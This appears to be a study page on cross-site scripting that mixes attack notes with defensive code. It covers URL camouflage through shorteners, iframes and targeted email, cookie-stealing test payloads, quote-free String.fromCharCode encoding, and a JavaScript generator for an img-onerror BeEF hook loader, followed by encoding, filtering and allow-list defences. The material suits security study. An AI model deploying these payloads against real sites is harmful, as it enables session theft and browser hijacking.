[XSS] Cross Site Scripting
Links
https://portswigger.net/web-security/cross-site-scripting
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)
YouTube
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MoYN8LF4vsGNtgwmLinMnW3
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=60
https://www.youtube.com/watch?v=I0SusAlT1wY&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=63
Camouflage the URL (hide the payload from the victim)
tinyurl (URL shortener)
iframes (load the malicious URL inside an attacker-controlled page)
link in a targeted email
<plaintext> tag/payloads for testing
<plaintext>: if reflected unencoded, the browser renders the rest of the page as raw text, a quick check that HTML is being injected
alert('abc');alert(document.cookie)
String.fromCharCode(xxx, xxx, xxx): builds a string from character codes, so the payload needs no quote characters when quotes are filtered
Payload example
PHP code injection
Browser Redirection and IFRAME Injection
Stealing Cookies and Session Information
Exploitation with BeEF (Browser Exploitation Framework)
https://www.youtube.com/watch?v=gU_zv8HIG2g&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=177
https://www.youtube.com/watch?v=t-44ZsaeIQE&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=199
Inject the BeEF hook script (hook.js) into the page through the XSS
With event handlers (e.g. onerror/onload on an injected element) when <script> tags are filtered
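An added example (not from the original notes or from BeEF itself) tying the testing and exploitation notes together: a payload is rewritten as String.fromCharCode(...) so it contains no quote characters, and that form is used to build a hook loader that fits inside an event-handler attribute. The hook URL is a constructed placeholder (BeEF's default port and path), not a live server.

```javascript
// Added example: quote-free payloads via String.fromCharCode and an
// event-handler delivery of a BeEF-style hook. Placeholder URL, no real server.

// Encode every UTF-16 code unit of `js` as a number so the result needs no quotes.
function toCharCode(js) {
  const codes = [];
  for (let i = 0; i < js.length; i++) codes.push(js.charCodeAt(i));
  return `String.fromCharCode(${codes.join(',')})`;
}

// Evaluate the expression the way a browser would, to confirm the round trip.
function evalCharCode(expr) {
  return new Function('return ' + expr)();
}

// Loader that appends <script src=hookUrl> to the page. Both string literals
// go through toCharCode, so the whole statement contains no quote characters.
function hookLoader(hookUrl) {
  return (
    'var s=document.createElement(' + toCharCode('script') + ');' +
    's.src=' + toCharCode(hookUrl) + ';' +
    'document.body.appendChild(s)'
  );
}

// Wrap JavaScript in an onerror handler on a broken image. The attribute is
// double-quoted, so the handler body must not contain a double quote.
function imgOnerrorPayload(js) {
  if (js.includes('"')) throw new Error('handler body must not contain a double quote');
  return `<img src=x onerror="${js}">`;
}

// Used by the checks below: does the payload still rely on any quote character?
function hasQuotes(s) {
  return /['"]/.test(s);
}

// Constructed placeholder: BeEF's default hook URL on localhost (assumption).
const HOOK_URL = 'http://127.0.0.1:3000/hook.js';

console.log(toCharCode("alert('abc')"));
console.log(imgOnerrorPayload(hookLoader(HOOK_URL)));
```

The loader form is what goes into the reflected parameter when `<script>` is stripped but event handlers survive; the fromCharCode form is what to reach for when the reflection sits inside a quoted string and the quote characters are filtered.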
How to prevent XSS
Encoding: < becomes &lt; (output encoding for the HTML context the value is rendered in)
Filtering: <script> becomes script (tags stripped; easy to bypass on its own)
Validating: compare input against white list
Sanitization: combination of escaping, filtering and validation
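The four defences from the list above as an added example (my own code, not from the original notes or any library): entity encoding, a naive single-pass `<script>` filter next to a repeated one, an allow-list check, and a render function that combines them. The bypass input is the nested `<scr<script>ipt>` trick from the OWASP filter-evasion cheat sheet linked at the top; the username policy is a constructed assumption.

```javascript
// Added example: the defences from the notes above as small functions.

const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encoding: escape the characters that can break out of an HTML text or
// quoted-attribute context. This is the primary defence.
function encodeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Filtering (naive): remove <script> and </script> in one pass.
// Bypassable: "<scr<script>ipt>" collapses to "<script>" after the pass.
function naiveStripScript(s) {
  return s.replace(/<\/?script>/gi, '');
}

// Filtering (repeated): loop until the output stops changing, so stripped
// fragments cannot re-form a tag. Still incomplete: event handlers such as
// onerror on an <img> are not touched at all.
function stripScriptRepeated(s) {
  let prev;
  do {
    prev = s;
    s = naiveStripScript(s);
  } while (s !== prev);
  return s;
}

// Validating: compare input against an allow list (constructed policy).
const USERNAME_RE = /^[A-Za-z0-9_]{1,32}$/;
function isValidUsername(s) {
  return USERNAME_RE.test(s);
}

// Sanitization: validate where a strict format exists, and always encode
// for the output context. Rejects instead of "cleaning" an invalid name.
function renderGreeting(name) {
  if (!isValidUsername(name)) throw new Error('username rejected by allow list');
  return `<p>Hello, ${encodeHtml(name)}</p>`;
}

// Free text cannot be allow-listed, so it is encoded on output.
function renderComment(text) {
  return `<p>${encodeHtml(text)}</p>`;
}

console.log(naiveStripScript('<scr<script>ipt>alert(1)</script>'));
console.log(stripScriptRepeated('<img src=x onerror=alert(1)>'));
console.log(renderComment('<img src=x onerror=alert(1)>'));
```

The two filter functions are there to show the gap, not as a recommendation: the repeated version survives the nesting trick but passes the event-handler payload through untouched, while `encodeHtml` neutralises both because it never tries to decide what is dangerous.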